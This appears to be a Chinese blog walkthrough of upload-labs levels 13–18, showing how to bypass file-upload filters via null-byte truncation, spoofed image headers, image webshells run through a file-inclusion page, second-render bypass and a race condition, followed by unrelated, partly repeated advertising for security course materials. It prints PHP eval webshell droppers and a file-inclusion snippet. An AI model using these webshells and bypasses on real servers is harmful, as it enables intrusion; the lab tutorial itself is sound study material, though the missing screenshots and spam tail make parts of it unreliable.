文件上传漏洞 （upload部分通关教程）_upload文件上传漏洞(1)

• 绕过访问控制： 攻击者可能截断文件名以绕过访问控制，访问他们本不应该有权限访问的文件。
• 绕过文件类型检查： 通过绕过文件扩展名检查，攻击者可能欺骗系统执行他们恶意上传的文件，从而引发安全问题。 在URL编码中，%00代表空字节，也称为Null字节。它是ASCII字符集中的控制字符，其值为0。在URL编码中，空字节通常以"%00"的形式表示。

首先上传111.jpg（含有一句话木马），使用burp拦截，更改路径字段

改为：

十八、0X00截断（第十三关）

十三管采用POST提交路径数据，使用0X00来截断

0x00 截断（Null Byte Injection）是一种针对字符串截断漏洞的攻击技术。该漏洞通常出现在对用户输入进行处理的应用程序中，当应用程序未正确处理用户输入中的特殊字符，特别是空字符（0x00）时，攻击者可以利用这个漏洞来执行恶意操作。

0x00 是 ASCII 字符集中的空字符，它在字符串中通常表示字符串的结束标志。但是，如果应用程序没有正确处理这个空字符，可能导致以下问题：

1. 截断字符串：攻击者可以在用户输入中插入一个 0x00 字符，这样应用程序在处理时会将字符串截断为两部分，从而绕过原本的限制或过滤机制。
2. 绕过文件扩展名检查：某些应用程序可能根据文件扩展名来判断文件类型，通过插入 0x00 字符，攻击者可以绕过文件扩展名检查，欺骗应用程序认为上传的文件是允许的类型，从而执行恶意操作。
3. 路径遍历：类似于目录遍历攻击，通过插入 0x00 字符，攻击者可能实现路径遍历，访问到他们不应该访问的敏感文件或目录。

需要修改这个字段：

修改后：

十九、图片字节标识

0x代表十六进制

有些会根据图片的编码来过滤文件，比如看到FF D8就知道是JPEG格式。

比如打开一个jpg文件：

二十、字节标识绕过（第十四关）

需要配合文件包含漏洞触发

查看一下png的头部 十六进制的89转化为十进制的137, 50转化为80，这样就可以进行判断

文件包含漏洞代码：

<?php /* 本页面存在文件包含漏洞，用于测试图片马是否能正常运行！ */ header("Content-Type:text/html;charset=utf-8"); $file = $_GET['file']; if(isset($file)){ include $file; }else{ show_source(__file__); } ?>

方法一（简单）

直接上传包含一句话木马的合法文件（需要合成），然后利用文件包含漏洞访问此文件。

1、合成木马合法文件：

将有一句话木马的111.php合到123.jpg中：

然后将hack.jpg上传

访问有文件包含漏洞的页面

从该页面包含我们上传的木马文件，并访问（1.txt自己制作的在upload目录下）

我们在1.txt中编写php，也能被运行；即使是1.jpg也能运行里面的php语言

然后使用文件包含漏洞访问木马文件，注意文件的位置，index和upload是同级目录，要访问的是upload下的文件

访问成功：

然后连接蚁剑：

方法二

我们的目的是上传一个合法的png文件，文件包含着一句话木马

制作这个文件：

找一个txt格式的文件写下一句话木马，然后保存成jpg格式

（写上aa其实是为了方便在010editor中编辑，占位置用的）

然后编辑此jpg，将头部信息改为png的

改前：（a代表61）

改后：

然后上传此jpg文件

上传完成后我们右击查看此文件发现变成了png，发现文件的拓展名和上传的不一样了

利用文件包含漏洞访问，成功

连接蚁剑：

二十一、图片马绕过（第十五关）

使用了image_type_to_extension()函数防止第十四关的绕过

image_type_to_extension()是一个函数，它用来将图像类型（比如JPEG、PNG等）转换为对应的文件扩展名（例如.jpg、.png等）。这个函数通常用于根据图像类型获取到对应的文件扩展名，以便在处理图像文件时使用正确的文件扩展名。例如，如果你知道一个图像文件的类型是JPEG，但不知道其文件扩展名，你可以使用image_type_to_extension()函数来获取到正确的文件扩展名".jpg"。

绕过原理和第十四关的方法一一样，我们使用的方法既没有改变文件的拓展名，又能上传木马

连接蚁剑：

二十二、图片马绕过（第十六关）

前提：开启图片所示的拓展，否则关卡黑屏。。。

其他的操作和第十四关（方法一）一样

二十三、二次渲染绕过（第十七关）

这关会将上传的图片进行二次渲染，生成新的图片。

因此当我们上传含有一句话木马的图片时，发现含有的一句话木马消失了：

因为当进行重写时，图片的原始信息被保留，但是php语句不是图片信息，所以会被重写掉

方法一

绕过：（建议使用gif格式，因为其中的某些字节不会被重写）

我们先使用gif文件上传一次，然后另存我们上传的图片，将两个图片进行比较，如图所示，蓝色的就是没有变化的地方。

接下来将木马插入到gif图片中，尽量是蓝色的地方靠后的位置

上传制作好的gif图片，使用文件包含漏洞连接蚁剑

方法二

二次渲染不会对已经渲染过的图片进行渲染

所以将上传过的图片拿回来，插入木马，再上传即可

将 上传过拿回来的图片 进行插入木马

上传此图片，使用文件包含漏洞连接蚁剑

不过在我的尝试中，二次上传依然会进行渲染，改掉我的木马。。。

二十四、条件竞争原理与绕过（第十八关）

文件先会上传到服务器中（很短时间），再进行判断，然后会被存放到某个路径中

利用时间差进行上传攻击，先上传一个小马，作用是生成一个新的Webshell脚本，小马上传后，立即对其访问，就会生成Webshell脚本

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["a"])?>');?> <?php fputs(fopen('../shell.php','w'),'<?php @eval($_POST[a]) ?>');

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

*，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-hAjTIfs6-1712631998554)]